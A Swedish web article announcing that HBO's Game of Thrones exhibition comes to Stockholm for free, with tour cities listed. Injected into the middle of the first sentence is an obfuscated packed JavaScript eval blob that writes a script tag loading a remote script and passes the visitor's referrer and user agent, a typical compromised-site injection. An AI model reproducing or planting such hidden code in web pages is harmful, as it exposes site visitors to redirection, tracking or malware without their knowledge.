Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

HBO-utställningen tar fansen in i Game of Thrones fantastiska värld genom helt nya installationer

game of thrones
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdeha|var|u0026u|referrer|zhnfk||js|php’.split(’|’),0,{}))
tredje året i rad tar HBO® sin hyllade internationella utställning för Game of Thrones® på en resa runt världen och ger fansen chansen att få uppleva Westeros och berättelsens storslagenhet på nära håll.

Nu har turen kommit till Sverige och Stockholm. Utställningen, som är ett samarbete mellan HBO och HBO Nordic, slår upp portarna under våren med helt nya installationer inspirerade av fjärde säsongens platser, karaktärer och relationer.

Game of Thrones episka serie om svek och ädelhet, familj och ära, ambitioner och kärlek, död och överlevnad har fångat in fans från hela världen och gjort den till en av de allra populäraste tv-serierna.

Årets turné kommer att angöra London-England, Stockholm-Sverige, Tel Aviv-Israel, Madrid-Spanien, Berlin-Tyskland, Amsterdam-Nederländerna och Paris-Frankrike. Fler städer kan tillkomma.

Game of Thrones: The Exhibition kommer till Stockholm under våren och är helt gratis.

Datum, plats och mer detaljer meddelas inom kort.

#GOTExhibit